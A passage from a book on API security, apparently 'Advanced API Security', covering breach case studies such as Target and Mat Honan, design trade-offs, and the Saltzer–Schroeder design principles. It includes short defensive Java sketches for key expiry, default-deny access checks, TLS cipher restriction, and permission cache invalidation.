32 but none of them are exposed outside. The Netflix API still acts as their public-facing interface, and there is a one-to-many relationship between the Netflix API and its microservices. In other words, one API could talk to multiple microservices to cater a request generated by one of the devices supported by Netflix. Microservices have not substituted APIs—rather they work together. Summary • The API adoption has grown rapidly in the last few years, and almost all the cloud service providers today expose public managed APIs. • In contrast to naked APIs, the managed APIs are secured, throttled, versioned, and monitored. • An API store (or a developer portal), API publisher, and API gateway are the three key ingredients in building an API management solution. • Lifecycle management is a key differentiator between a naked API and a managed API. A managed API has a lifecycle from its creation to its retirement. A typical API lifecycle might flow through Created, Published, Deprecated, and Retired stages. • Microservices have not substituted APIs—rather they work together. Chapter 1 apIs rule! 33 © Prabath Siriwardena 2020 P. Siriwardena, Advanced API Security, https://doi.org/10.1007/978-1-4842-2050-4_2 CHAPTER 2 Designing Security for APIs Just a few days after everyone celebrated Thanksgiving Day in 2013, someone who fooled the Target defense system installed a malware in its security and payment system. It was the peak time in business for any retailer in the United States. While the customers were busy in getting ready for Christmas, the malware which was sitting in the Target payment system silently captured all the credit card information from the cashier’s terminal and stored them in a server, which was under the control of the attacker. Forty million credit card numbers were stolen in this way from 1797 Target stores around the country.1 It was a huge breach of trust and credibility from the retailer, and in March 2015 a federal judge in St. Paul, Minnesota, approved a $10 million offer by Target to settle the lawsuit against the data breach.2 Not just Target or the retail industry but as a whole, the cybercrime has gained a lot of momentum in the last few years. Figure 2-1 shows the annual number of data breaches and exposed records in the United States from 2005 to 2018. The attack on Dyn DNS in 2016 was one of the largest DDoS (distributed denial of service) attacks that took many large Internet services down for several hours. Then in February 2018, the largest recorded DDoS attack happened against GitHub. More than 1.35 terabits per second of traffic hit the developer platform GitHub all at once.3 1 Target Credit Card Hack, http://money.cnn.com/2013/12/22/news/companies/ target-credit-card-hack/ 2 Target Data Hack Settlement, http://money.cnn.com/2015/03/19/technology/security/ target-data-hack-settlement/ 3 GitHub Survived the Biggest DDoS Attack Ever Recorded, www.wired.com/story/ github-ddos-memcached/ 34 Identity Theft Resource Center4 defines a data breach as the loss of information from computers or storage media that could potentially lead to identity theft, including social security numbers, bank account details, driving license numbers, and medical information. The most worrisome fact is that, according to an article5 by The Economist magazine, the average time between an attacker breaching a network and its owner noticing the intrusion is 205 days. 
Trinity of Trouble

Connectivity, extensibility, and complexity are the three trends behind the rise of data breaches around the globe in the last few years. Gary McGraw, in his book Software Security,6 identifies these three trends as the trinity of trouble.

Figure 2-1. Annual number of data breaches and exposed records in the United States from 2005 to 2018 (in millions), Statistica, 2019

4 Identity Theft Resource Center, www.idtheftcenter.org/
5 The cost of immaturity, www.economist.com/news/business/21677639-business-protecting-against-computer-hacking-booming-cost-immaturity
6 Gary McGraw, Software Security: Building Security In, Addison-Wesley Publisher

APIs play a major role in connectivity. As we discussed in detail in Chapter 1, we live in a world today where almost everything is connected to everything else. Connectivity exposes many paths of exploitation for attackers, which never existed before. Logging in to Yelp, Foursquare, Instagram, and many more via Facebook means an attacker only needs to worry about compromising one's Facebook account to get access to all of his or her other connected accounts.

FACEBOOK DATA BREACH ~ SEPTEMBER 2018

In September 2018, the Facebook team figured out an attack,7 which put the personal information of more than 50 million Facebook users at risk. The attackers exploited multiple issues in the Facebook code base around the View As feature and got hold of OAuth 2.0 access tokens that belonged to more than 50 million users. An access token is some kind of a temporary token or key, which one can use to access a resource on behalf of someone else. Say, for example, I want to share my photos uploaded to Instagram on my Facebook wall. I would give an access token corresponding to my Facebook wall, which I obtained from Facebook, to Instagram. Now, each time I upload a photo to Instagram, it can use the access token to access my Facebook account and publish the same photo on my Facebook wall using the Facebook API. Even though Instagram can post photos on my Facebook wall using the provided access token, it cannot do anything else other than that. For example, it cannot see my friend list, delete my wall posts, or read my messages. Also, this is usually what happens when you log in to a third-party application via Facebook; you simply share an access token corresponding to your Facebook account with the third-party web application, so the third-party web application can use the access token to access the Facebook API to learn more about you.

In a connected enterprise, not just the applications developed with modern, bleeding-edge technology get connected but also the legacy systems. These legacy systems may not support the latest security protocols, even Transport Layer Security (TLS) for securing data in transit. Also, the libraries used in those systems could have many well-known security vulnerabilities, which are not fixed due to the complexities in upgrading to the latest versions. All in all, a connected system that is not planned and designed well could easily become a security graveyard.

7 What Went Wrong?, https://medium.facilelogin.com/what-went-wrong-d09b0dc24de4

Most enterprise software today is developed with great extensibility. Extensibility over modification is a well-known design philosophy in the software industry.
It talks about building software to evolve with new requirements, without changing or modifying the current source code, but having the ability to plug in new software components to the current system. Google Chrome extensions and Firefox add-ons all follow this concept. The Firefox add-on, Modify Headers, lets you add, modify, and filter the HTTP request headers sent to web servers. Another Firefox add- on, SSO Tracer, lets you track all the message flows between identity providers and service providers (web applications), via the browser. None of these are harmful—but, then again, if an attacker can fool you to install a malware as a browser plugin, it could easily bypass all your browser-level security protections, even the TLS, to get hold of your Facebook, Google, Amazon, or any other web site credentials. It’s not just about an attacker installing a plugin into the user’s browser, but also when there are many extensions installed in your browser, each one of them expands the attack surface. Attackers need not write new plugins; rather they can exploit security vulnerability in an already installed plugin. THE STORY OF MAT HONAN it was a day in august 2012. Mat honan, a reporter for Wired magazine, san francisco, returned home and was playing with his little daughter.8 he had no clue what was going to happen next. suddenly his iphone was powered down. he was expecting a call—so he plugged it into a wall power socket and rebooted back. What he witnessed next blew him away. instead of the iphone home screen with all the apps, it asked for him to set up a new phone with a big apple logo and a welcome screen. honan thought his iphone was misbehaving—but was not that worried since he backed up daily to the iCloud. restoring everything from iCloud could simply fix this, he thought. honan tried to log in to iCloud. tried once—failed. tried again—failed. again—failed. thought he was excited. tried once again for the last time, and failed. now he knew something weird has happened. his last hope was his MacBook. thought at least he could restore everything from the local backup. Booted up the MacBook and found nothing in it—and it prompted him to enter a four-digit passcode that he has never set up before. 8 How Apple and Amazon Security Flaws Led to My Epic Hacking, www.wired.com/2012/08/ apple-amazon-mat-honan-hacking Chapter 2 Designing seCurity for apis 37 honan called apple tech support to reclaim his iCloud account. then he learned he has called apple, 30 minutes before, to reset his iCloud password. the only information required at that time to reset an iCloud account was the billing address and the last four digits of the credit card. the billing address was readily available under the whois internet domain record honan had for his personal web site. the attacker was good enough to get the last four digits of honan’s credit card by talking to amazon helpdesk; he already had honan’s email address and the full mailing address—those were more than enough for a social engineering attack. honan lost almost everything. the attacker was still desperate—next he broke into honan’s gmail account. then from there to his twitter account. one by one—honan’s connected identity falls into the hands of the attacker. The complexity of the source code or the system design is another well-known source of security vulnerabilities. 
According to research, after some point, the number of defects in an application goes up as the square of the number of lines of code.9 At the time of this writing, the complete Google codebase to run all its Internet services was around 2 billion lines of code, while the Microsoft Windows operating system had around 50 million lines of code.10 As the number of lines of code grows, the number of tests around the code should grow as well, to make sure that none of the existing functionality is broken and the new code works in the expected way. At Nike, 1.5 million lines of test code are run against 400,000 lines of code.11

Design Challenges

Security isn't an afterthought. It has to be an integral part of any development project, and the same applies to APIs. It starts with requirements gathering and proceeds through the design, development, testing, deployment, and monitoring phases. Security brings a plethora of challenges into the system design. It's hard to build a 100% secure system. The only thing you can do is to make the attacker's job harder. This is in fact the philosophy followed while designing cryptographic algorithms. The following discusses some of the key challenges in a security design.

9 Encapsulation and Optimal Module Size, www.catb.org/esr/writings/taoup/html/ch04s01.html
10 Google Is 2 Billion Lines of Code, www.catb.org/esr/writings/taoup/html/ch04s01.html
11 Nike's Journey to Microservices, www.youtube.com/watch?v=h30ViSEZzW0

MD5

The MD5 algorithm12 (an algorithm for message hashing), which was designed in 1992, was accepted to be a strong hashing algorithm. One of the key attributes of a hashing algorithm is that, given the text, the hash corresponding to that text can be generated; but, given a hash, the text corresponding to the hash cannot be derived. In other words, hashes are not reversible. If the text can be derived from a given hash, then that hashing algorithm is broken. The other key attribute of a hashing algorithm is that it should be collision-free. In other words, any two distinct text messages must not result in the same hash. The MD5 design preserved both of these properties at the time of its design. With the available computational power, it was hard to break MD5 in the early 1990s. As computational power increased and was made available to many people via cloud-based infrastructure as a service (IaaS) providers, like Amazon, MD5 was proven to be insecure. On March 1, 2005, Arjen Lenstra, Xiaoyun Wang, and Benne de Weger demonstrated that MD5 is susceptible to hash collisions.13

12 RFC 1321: The MD5 Message-Digest Algorithm, https://tools.ietf.org/html/rfc1321
13 Colliding X.509 Certificates, http://eprint.iacr.org/2005/067.pdf

User Experience

The most challenging thing in any security design is to find and maintain the right balance between security and user comfort. Say you have the most complex password policy ever, which can never be broken by any brute-force attack. A password has to have more than 20 characters, with mandatory uppercase and lowercase letters, numbers, and special characters. Who on Earth is going to remember their password? Either you'll write it on a piece of paper and keep it in your wallet, or you'll add it as a note on your mobile device. Either way, you lose the ultimate objective of the strong password policy. Why would someone carry out a brute-force attack when the password is written down and kept in a wallet? The principle of psychological acceptability, discussed later in this chapter, states that security mechanisms should not make the resource more difficult to access than if the security mechanisms were not present.

We have a few good examples from the recent past where user experience drastically improved while keeping security intact. Today, with the latest Apple Watch, you can unlock your MacBook without retyping the password. Also the face recognition
We have a few good examples from the recent past where user experience drastically improved while keeping security intact. Today, with the latest Apple Watch, you can unlock your MacBook without retyping the password. Also, the face recognition technology introduced in the latest iPhones lets you unlock the phone just by looking at it. You never even notice that the phone was locked.

It is essential that the human interface be designed for ease of use, so that users routinely and automatically apply the protection mechanisms correctly. Also, to the extent that the user's mental image of his protection goals matches the mechanisms he must use, mistakes will be minimized. If he must translate his image of his protection needs into a radically different specification language, he will make errors.

—Jerome Saltzer and Michael Schroeder

12 RFC 1321: The MD5 Message-Digest Algorithm, https://tools.ietf.org/html/rfc1321
13 Colliding X.509 Certificates, http://eprint.iacr.org/2005/067.pdf

Performance

Performance is another key criterion. What is the cost of the overhead you add to your business operations to protect them from intruders? Say you have an API secured with a key, and each API call must be digitally signed. If the key is compromised, an attacker can use it to access the API. How do you minimize the impact? You can make the key valid only for a very short period, so whatever the attacker can do with the stolen key is limited to its lifetime. What kind of impact will this have on legitimate day-to-day business operations? Each client application should first check the validity period of the key (before doing the API call) and, if it has expired, make a call to the authorization server (the issuer of the key) to generate a new key. If you make the lifetime too short, then for almost every API call there will be a call to the authorization server to generate a new key. That kills performance—but drastically reduces the impact of an intruder getting access to the API key.

The use of TLS for transport-level security is another good example. We will be discussing TLS in Appendix C, in detail. TLS provides protection for data in transit. When you pass your login credentials to Amazon or eBay, they are passed over a secured communication channel, or HTTP over TLS, which is in fact HTTPS. No one in the middle will be able to see the data passed from your browser to the web server (assuming there is no room for a man-in-the-middle attack). But this comes at a cost. TLS adds overhead over the plain HTTP communication channel, which slows things down a bit. For the exact same reason, some enterprises follow the strategy where all of the communication channels open to the public are over HTTPS, while the communication between internal servers is over plain HTTP. They make sure no one can intercept any of those internal channels by enforcing strong network-level security. The other option is to use optimized hardware to carry out the encryption/decryption process in the TLS communication. Doing the encryption/decryption at the dedicated hardware level is far more cost-effective, in terms of performance, than doing the same at the application level. Even with TLS, the message is only protected while it is in transit. As soon as the message leaves the transport channel, it's in cleartext. In other words, the protection provided by TLS is point to point.
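Before looking at what point-to-point protection means in practice, here is a minimal client-side sketch of the short-lived key strategy described under Performance. The ApiKey holder, the fetchNewKey() call, and the five-minute lifetime are all hypothetical placeholders; the point is only that the client reuses the cached key until it is close to expiry and pays the cost of a round trip to the authorization server only then.

```java
import java.time.Duration;
import java.time.Instant;

public class ShortLivedKeyClient {

    // Hypothetical holder for a key issued by the authorization server.
    static class ApiKey {
        final String value;
        final Instant expiresAt;
        ApiKey(String value, Instant expiresAt) { this.value = value; this.expiresAt = expiresAt; }
    }

    private ApiKey cachedKey;

    // Placeholder for the (comparatively expensive) call to the authorization server.
    private ApiKey fetchNewKey() {
        return new ApiKey("key-" + System.nanoTime(), Instant.now().plus(Duration.ofMinutes(5)));
    }

    // Reuse the cached key while it is valid; renew it only when it is about to expire.
    // A shorter lifetime limits the damage of a stolen key but increases renewal traffic.
    String currentKey() {
        if (cachedKey == null || Instant.now().isAfter(cachedKey.expiresAt.minusSeconds(30))) {
            cachedKey = fetchNewKey();
        }
        return cachedKey.value;
    }

    public static void main(String[] args) {
        ShortLivedKeyClient client = new ShortLivedKeyClient();
        System.out.println(client.currentKey()); // triggers a fetch
        System.out.println(client.currentKey()); // served from the cache
    }
}
```

Tuning the lifetime and the renewal margin is exactly the security-versus-performance compromise discussed above.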
When you log in to your banking web site from the browser, your credentials are only secured from your browser to the web server at your bank. If the web server talks to a Lightweight Directory Access Protocol (LDAP) server to validate the credentials, once again if this channel is not explicitly protected, then the credentials will be passed in cleartext. If anyone logs all the in and out messages to and from the bank’s web server, then your credentials will be logged in plaintext. In a highly secured environment, this may not be acceptable. Using message-level security over transport-level security is the solution. With message-level security, as its name implies, the message is protected by itself and does not rely on the underlying transport for security. Since this has no dependency on the transport channel, the message will be still protected, even after it leaves the transport. This once again comes at a high performance cost. Using message-level protection is much costlier than simply using TLS. There is no clear-cut definition on making a choice between the security and the performance. Always there is a compromise, and the decision has to be taken based on the context. Weakest Link A proper security design should care about all the communication links in the system. Any system is no stronger than its weakest link. In 2010, it was discovered that since 2006, a gang of robbers equipped with a powerful vacuum cleaner had stolen more than 600,000 euros from the Monoprix supermarket chain in France.14 The most interesting thing was the way they did it. They found out the weakest link in the system and attacked it. To transfer money directly into the store’s cash coffers, cashiers slid tubes filled with 14 “Vacuum Gang” Sucks Up $800,000 From Safeboxes, https://gizmodo.com/ vacuum-gang-sucks-up-800-000-from-safeboxes-5647047 Chapter 2 Designing seCurity for apis 41 money through pneumatic suction pipes. The robbers realized that it was sufficient to drill a hole in the pipe near the trunk and then connect a vacuum cleaner to capture the money. They didn’t have to deal with the coffer shield. Not always, the weakest link in a system is either a communication channel or an application. There are many examples which show the humans have turned out to be the weakest link. The humans are the most underestimated or the overlooked entity in a security design. Most of the social engineering attacks target humans. In the famous Mat Honan’s attack, calling to an Amazon helpdesk representative, the attacker was able to reset Mat Honan’s Amazon credentials. The October 2015 attack on CIA Director John Brennan’s private email account is another prime example of social engineering.15 The teen who executed the attack said, he was able to fool a Verizon worker to get Brennan’s personal information and duping AOL into resetting his password. The worst side of the story is that Brennan has used his private email account to hold officially sensitive information—which is again a prime example of a human being the weakest link of the CIA defense system. Threat modeling is one of the techniques to identify the weakest links in a security design. Defense in Depth A layered approach is preferred for any system being tightened for security. This is also known as defense in depth. Most international airports, which are at a high risk of terrorist attacks, follow a layered approach in their security design. 
On November 1, 2013, a man dressed in black walked into the Los Angeles International Airport, pulled a semi-automatic rifle out of his bag, and shot his way through a security checkpoint, killing a TSA screener and wounding at least two other officers.16 This was the first layer of defense. In case someone got through it, there has to be another to prevent the gunman from entering a flight and taking control. If there had been a security layer before the TSA, maybe just to scan everyone who entered the airport, it would have detected the weapon and probably saved the life of the TSA officer. NSA (National Security Agency of the United States) identifies defense in depth as a practical strategy for achieving information assurance in today’s highly networked 15 Teen says he hacked CIA director’s AOL account, http://nypost.com/2015/10/18/ stoner-high-school-student-says-he-hacked-the-cia/ 16 Gunman kills TSA screener at LAX airport, https://wapo.st/2QBfNoI Chapter 2 Designing seCurity for apis 42 environments.17 It further explains layered defense under five classes of attack: passive monitoring of communication channels, active network attacks, exploitation of insiders, close-in attacks, and attacks through various distribution channels. The link and network layer encryption and traffic flow security is proposed as the first line of defense for passive attacks, and the second line of defense is the security-enabled applications. For active attacks, the first line of defense is the enclave boundaries, while the second line of defense is the computing environment. The insider attacks are prevented by having physical and personnel security as the first line of defense and having authentication, authorization, and audits as the second line of defense. The close-in attacks are prevented by physical and personnel security as the first layer and having technical surveillance countermeasures as the second line of defense. Adhering to trusted software development and distribution practices and via runtime integrity controls prevents the attacks via multiple distributed channels. The number of layers and the strength of each layer depend on which assets you want to protect and the threat level associated with them. Why would someone hire a security officer and also use a burglar alarm system to secure an empty garage? Insider Attacks Insider attacks are less complicated, but highly effective. From the confidential US diplomatic cables leaked by WikiLeaks to Edward Snowden’s disclosure about the National Security Agency’s secret operations, all are insider attacks. Both Snowden and Bradley Manning were insiders who had legitimate access to the information they disclosed. Most organizations spend the majority of their security budget to protect their systems from external intruders; but approximately 60% to 80% of network misuse incidents originate from inside the network, according to the Computer Security Institute (CSI) in San Francisco. There are many prominent insider attacks listed down in the computer security literature. One of them was reported in March 2002 against the UBS Wealth Management firm in the United States. UBS is a global leader in wealth management having branches over 50 countries. Roger Duronio, one of the system administrators at UBS, found guilty of computer sabotage and securities fraud for writing, planting, and disseminating malicious code that took down up to 2000 servers. 
The US District Court in Newark, 17 Defense in Depth, www.nsa.gov/ia/_files/support/defenseindepth.pdf Chapter 2 Designing seCurity for apis 43 New Jersey, sentenced him for 97 months in jail.18 The Target data breach that we discussed at the beginning of the chapter is another prime example for an insider attack. In that case, even the attackers were not insiders, they gained access to the Target internal system using the credentials of an insider, who is one of the company’s refrigeration vendors. According to an article by Harvard Business Review (HBR),19 at least 80 million insider attacks take place in the United States each year. HBR further identifies three causes for the growth of insider attacks over the years: • One is the dramatic increase in the size and the complexity of IT. As companies grow in size and business, a lot of isolated silos are being created inside. One department does not know what the other does. In 2005 call center staffers based in Pune, India, defrauded four Citibank account holders in New York of nearly $350,000, and later it was found those call center staffers are outsourced employees of Citibank itself and had legitimate access to customers’ PINs and account numbers. • The employees who use their own personal devices for work are another cause for the growing insider threats. According to a report released by Alcatel-Lucent in 2014, 11.6 million mobile devices worldwide are infected at any time.20 An attacker can easily exploit an infected device of an insider to carry out an attack against the company. • The third cause for the growth of insider threats, according to the HBR, is the social media explosion. Social media allow all sorts of information to leak from a company and spread worldwide, often without the company’s knowledge. Undoubtedly, insider attacks are one of the hardest problems to solve in a security design. These can be prevented to some extent by adopting robust insider policies, raising awareness, doing employee background checks at the point of hiring them, 18 UBS insider attack, www.informationweek.com/ex-ubs-systems-admin-sentenced-to- 97-months-in-jail/d/d-id/1049873 19 The Danger from Within, https://hbr.org/2014/09/the-danger-from-within 20 Surge in mobile network infections in 2013, http://phys.org/news/2014-01-surge-mobile- network-infections.html Chapter 2 Designing seCurity for apis 44 enforcing strict processes and policies on subcontractors, and continuous monitoring of employees. In addition to these, SANS Institute also published a set of guidelines in 2009 to protect organizations from insider attacks.21 Note insider attacks are identified as a growing threat in the military. to address this concern, the us Defense advanced research projects agency (Darpa) launched a project called Cyber insider threat (CinDer) in 2010. the objective of this project was to develop new ways to identify and mitigate insider threats as soon as possible. Security by Obscurity Kerckhoffs’ principle22 emphasizes that a system should be secured by its design, not because the design is unknown to an adversary. One common example of security by obscurity is how we share door keys between family members, when there is only a single key. Everyone locks the door and hides the key somewhere, which is known to all the other family members. The hiding place is a secret, and it is assumed only family members know about it. In case if someone can find the hiding place, the house is no more secured. 
Another example for security by obscurity is Microsoft’s NTLM (an authentication protocol) design. It was kept secret for some time, but at the point (to support interoperability between Unix and Windows) Samba engineers reverse-engineered it, they discovered security vulnerabilities caused by the protocol design itself. Security by obscurity is widely accepted as a bad practice in computer security industry. However, one can argue it as another layer of security before someone hits the real security layer. This can be further explained by extending our first example. Let’s say instead of just hiding the door key somewhere, we put it to a lock box and hide it. Only the family members know the place where the lock box is hidden and also the key combination to 21 Protecting Against Insider Attacks, www.sans.org/reading-room/whitepapers/incident/ protecting-insider-attacks-33168 22 In 1883, Auguste Kerckhoffs published two journal articles on La Cryptographie Militaire in which he emphasized six design principles for military ciphers. This resulted in the well-known Kerckhoffs’ principle: A cryptosystem should be secured even if everything about the system, except the key, is public knowledge. Chapter 2 Designing seCurity for apis 45 open the lock box. The first layer of defense is the location of the box, and the second layer is the key combination to open the lock box. In fact in this case, we do not mind anyone finding the lock box, because finding the lock box itself is not sufficient to open the door. But, anyone who finds the lock box can break it to get the key out, rather than trying out the key combination. In that case, security by obscurity adds some value as a layer of protection—but it’s never good by its own. Design Principles Jerome Saltzer and Michael Schroeder produced one of the most widely cited research papers in the information security domain.23 According to the paper, irrespective of the level of functionality provided, the effectiveness of a set of protection mechanisms depends upon the ability of a system to prevent security violations. In most of the cases, building a system at any level of functionality that prevents all unauthorized actions has proved to be extremely difficult. For an advanced user, it is not hard to find at least one way to crash a system, preventing other authorized users accessing the system. Penetration tests that involved a large number of different general-purpose systems have shown that users can build programs to obtain unauthorized access to information stored within. Even in systems designed and implemented with security as a top priority, design and implementation flaws could provide ways around the intended access restrictions. Even though the design and construction techniques that could systematically exclude flaws are the topic of much research activity, according to Jerome and Michael, no complete method applicable to the construction of large general-purpose systems existed during the early 1970s. In this paper, Jerome Saltzer and Michael Schroeder further highlight eight design principles for securing information in computer systems, as described in the following sections. Least Privilege The principle of least privilege states that an entity should only have the required set of permissions to perform the actions for which they are authorized, and no more. Permissions can be added as needed and should be revoked when no longer in use. 
23 The Protection of Information in Computer Systems, http://web.mit.edu/Saltzer/www/ publications/protection/, October 11, 1974. Chapter 2 Designing seCurity for apis 46 This limits the damage that can result from an accident or error. The need to know principle, which follows the least privilege philosophy, is popular in military security. This states that even if someone has all the necessary security clearance levels to access information, they should not be granted access unless there is a real/proven need. Unfortunately, this principle didn’t apply in the case of Edward Snowden,24 or he was clever enough to work around it. Edward Snowden who worked for NSA (National Security Agency of the United States) as a contractor in Hawaii used unsophisticated techniques to access and copy an estimated 1.7 million classified NSA files. He was an employee of NSA and had legitimate access to all the information he downloaded. Snowden used a simple web crawler, similar to Google’s Googlebot (which collects documents from the Web to build a searchable index for the Google Search engine), to crawl and scrape all the data from NSA’s internal wiki pages. Being a system administrator, Snowden’s role was to back up the computer systems and move information to local servers; he had no need to know the content of the data. ISO 27002 (formerly known as ISO 17799) also emphasizes on the least privilege principle. ISO 27002 (Information Technology - Code of Practice for Information Security Management) standard is a well-known, widely used standard in the information security domain. It was originally developed by the British Standards Institution and called the BS7799 and subsequently accepted by the International Organization for Standardization (ISO) and published under their title in December 2000. According to ISO 27002, privileges should be allocated to individuals on a need-to-use basis and on an event-by-event basis, that is, the minimum requirement for their functional role only when needed. It further identifies the concept of “zero access” to start, which suggests that no access or virtually no access is the default, so that all subsequent access and the ultimate accumulation can be traced back through an approval process.25 Fail-Safe Defaults The fail-safe defaults principle highlights the importance of making a system safe by default. A user’s default access level to any resource in the system should be “denied” unless they’ve been granted a “permit” explicitly. A fail-safe design will not endanger the 24 Snowden Used Low-Cost Tool to Best NSA, www.nytimes.com/2014/02/09/us/snowden-used- low-cost-tool-to-best-nsa.html 25 Implementing Least Privilege at Your Enterprise, www.sans.org/reading-room/whitepapers/ bestprac/implementing-privilege-enterprise-1188 Chapter 2 Designing seCurity for apis 47 system when it fails. The Java Security Manager implementation follows this principle— once engaged, none of the components in the system can perform any privileged operations unless explicitly permitted. Firewall rules are another example. Data packets are only allowed through a firewall when it’s explicitly allowed; otherwise everything is denied by default. Any complex system will have failure modes. Failures are unavoidable and should be planned for, to make sure that no security risks get immerged as part of a system failure. Possibility of failures is an assumption made under the security design philosophy, defense in depth. 
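Coming back to the default-deny idea for a moment: the behavior described above (as in the Java Security Manager and firewall examples) can be captured in a few lines of code. The permission store and the subject and action names below are hypothetical; what matters is that an unknown subject or an ungranted action always evaluates to deny.

```java
import java.util.Map;
import java.util.Set;

public class DefaultDenyAuthorizer {

    // Hypothetical permission store: subject -> set of explicitly granted actions.
    private final Map<String, Set<String>> grants = Map.of(
            "alice", Set.of("orders:read", "orders:write"),
            "bob", Set.of("orders:read"));

    // Fail-safe default: anything not explicitly permitted is denied,
    // including unknown subjects and unknown actions.
    boolean isAllowed(String subject, String action) {
        return grants.getOrDefault(subject, Set.of()).contains(action);
    }

    public static void main(String[] args) {
        DefaultDenyAuthorizer authz = new DefaultDenyAuthorizer();
        System.out.println(authz.isAllowed("bob", "orders:write"));   // false: denied by default
        System.out.println(authz.isAllowed("alice", "orders:write")); // true: explicitly granted
    }
}
```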
If no failures are expected, there is no point of having multiple layers of defense. Let’s go through an example where every one of us is most probably familiar with: credit card verification. When you swipe your credit card at a retail store, the credit card machine there connects to the corresponding credit card service to verify the card details. The credit card verification service will verify the transaction after considering the available amount in the card, whether the card is reported as lost or blacklisted, and other context-sensitive information like the location where the transaction is initiated from, the time of the day, and many other factors. If the credit card machine fails to connect to the verification service, what would happen? In such case, the merchants are given a machine to get an imprint of your card manually. Getting an imprint of the card is not just sufficient, as it does not do any verification. The merchant also has to talk to his bank over the phone, authenticate by providing the merchant number, and then get the transaction verified. That’s the fail-safe process for credit card verification, as the failure of the credit card transaction machine does not lead into any security risks. In case the merchant’s phone line is also completely down, then according to the fail-safe defaults principle, the merchant should avoid accepting any credit card payments. The failure to adhere to fail-safe defaults has resulted in many TLS (Transport Layer Security)/SSL (Secure Sockets Layer) vulnerabilities. Most of the TLS/SSL vulnerabilities are based on the TLS/SSL downgrade attack, where the attacker makes the server to use a cryptographically weak cipher suite (we discuss TLS in depth in Appendix C). In May 2015, a group from INRIA, Microsoft Research, Johns Hopkins, the University of Michigan, and the University of Pennsylvania published a deep analysis26 of the Diffie- Hellman algorithm as used in TLS and other protocols. This analysis included a novel downgrade attack against the TLS protocol itself called Logjam, which exploits export cryptography. Export ciphers are weaker ciphers that were intentionally designed to be 26 Imperfect Forward Secrecy: How Diffie-Hellman Fails in Practice, https://weakdh.org/ imperfect-forward-secrecy-ccs15.pdf Chapter 2 Designing seCurity for apis 48 weaker to meet certain legal requirements enforced by the US government, in 1990s. Only weaker ciphers were legally possible to export into other countries outside the United States. Even though this legal requirement was lifted later on, most of the popular application servers still support export ciphers. The Logjam attack exploited the servers having support for export ciphers by altering the TLS handshake and forcing the servers to use a weaker cipher suite, which can be broken later on. According to the fail-safe defaults principle, in this scenario, the server should abort the TLS handshake when they see a cryptographically weaker algorithm is suggested by the client, rather than accepting and proceeding with it. Economy of Mechanism The economy of mechanism principle highlights the value of simplicity. The design should be as simple as possible. All the component interfaces and the interactions between them should be simple enough to understand. If the design and the implementation were simple, the possibility of bugs would be low, and at the same time, the effort on testing would be less. 
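Returning briefly to the downgrade attack described above: the fail-safe response is for the server to refuse to negotiate weak parameters at all. The following sketch shows one way to do that with the JDK's SSLServerSocket by enabling only modern protocol versions and a couple of strong cipher suites. It assumes a server certificate has already been configured (for example, through the standard javax.net.ssl keystore system properties), and the port number and the suite list are illustrative choices, not a recommendation list.

```java
import javax.net.ssl.SSLServerSocket;
import javax.net.ssl.SSLServerSocketFactory;

public class StrictTlsServerConfig {
    public static void main(String[] args) throws Exception {
        SSLServerSocketFactory factory =
                (SSLServerSocketFactory) SSLServerSocketFactory.getDefault();
        try (SSLServerSocket server = (SSLServerSocket) factory.createServerSocket(8443)) {
            // Only offer modern protocol versions; a handshake proposing anything older fails.
            server.setEnabledProtocols(new String[]{"TLSv1.3", "TLSv1.2"});
            // Only offer strong suites; export-grade or otherwise weak suites are never negotiated.
            server.setEnabledCipherSuites(new String[]{
                    "TLS_AES_256_GCM_SHA384",
                    "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"});
            System.out.println("Listening with a restricted protocol and cipher suite list");
            // server.accept() and request handling would follow in a real service.
        }
    }
}
```

With this configuration the handshake simply aborts when a client (or an attacker in the middle) proposes only weaker parameters, which is the fail-safe behavior the principle asks for.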
A simple and easy-to-understand design and implementation would also make it easy to modify and maintain, without introducing bugs exponentially. As discussed earlier in this chapter, Gary McGraw in his book, Software Security, highlights complexity in both the code and the system design as one attribute that is responsible for the high rate of data breaches. The keep it simple, stupid (KISS) principle introduced by the US Navy in 1960 is quite close to what Jerome Saltzer and Michael Schroeder explained under the economy of mechanism principle. It states that most systems work best if they are kept simple rather than made complicated.27 In practice, even though we want to adhere to the KISS principle, from operating systems to application code, everything is becoming more and more complex. Microsoft Windows 3.1 in 1990 started with a codebase slightly over 3 million lines of code. Over time, requirements got complex, and in 2001 Windows XP codebase crossed 40 million lines of code. As we discussed before in this chapter, at the time of this writing, the complete Google codebase to run all its Internet services was around 2 billion lines of code. Even though one can easily argue the increased number of lines of code will not directly reflect the code complexity, in most of the cases, sadly it’s the case. 27 KISS principle, https://en.wikipedia.org/wiki/KISS_principle Chapter 2 Designing seCurity for apis 49 Complete Mediation With complete mediation principle, a system should validate access rights to all its resources to ensure whether they’re allowed to access or not. Most systems do access validation once at the entry point to build a cached permission matrix. Each subsequent operation will be validated against the cached permission matrix. This pattern is mostly followed to address performance concerns by reducing the time spent on policy evaluation, but could quite easily invite attackers to exploit the system. In practice, most systems cache user permissions and roles, but employ a mechanism to clear the cache in an event of a permission or role update. Let’s have a look at an example. When a process running under the UNIX operating system tries to read a file, the operating system itself determines whether the process has the appropriate rights to read the file. If that is the case, the process receives a file descriptor encoded with the allowed level of access. Each time the process reads the file, it presents the file descriptor to the kernel. The kernel examines the file descriptor and then allows the access. In case the owner of the file revokes the read permission from the process after the file descriptor is issued, the kernel still allows access, violating the principle of complete mediation. According to the principle of complete mediation, any permission update should immediately reflect in the application runtime (if cached, then in the cache). Open Design The open design principle highlights the importance of building a system in an open manner—with no secrets, confidential algorithms. This is the opposite of security by obscurity, discussed earlier in the section “Design Challenges.” Most of the strong cryptographic algorithms in use today are designed and implemented openly. One good example is the AES (Advanced Encryption Standard) symmetric key algorithm. 
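Before turning to how AES was selected, here is a small sketch of the complete mediation principle from the previous subsection. The in-memory policy store below is just a stand-in for whatever the real source of authorization decisions is; the important detail is that any grant or revoke immediately invalidates the cached decision, so the next check reflects the change rather than a stale, more permissive answer.

```java
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

public class MediatedAccessChecker {

    // Hypothetical source of truth for permissions (in practice, a policy store or database).
    private final Map<String, Set<String>> policyStore = new ConcurrentHashMap<>();

    // Per-subject cache used on the hot path.
    private final Map<String, Set<String>> cache = new ConcurrentHashMap<>();

    void grant(String subject, String permission) {
        policyStore.computeIfAbsent(subject, s -> ConcurrentHashMap.newKeySet()).add(permission);
        cache.remove(subject); // invalidate so the next check sees the change
    }

    void revoke(String subject, String permission) {
        Set<String> granted = policyStore.get(subject);
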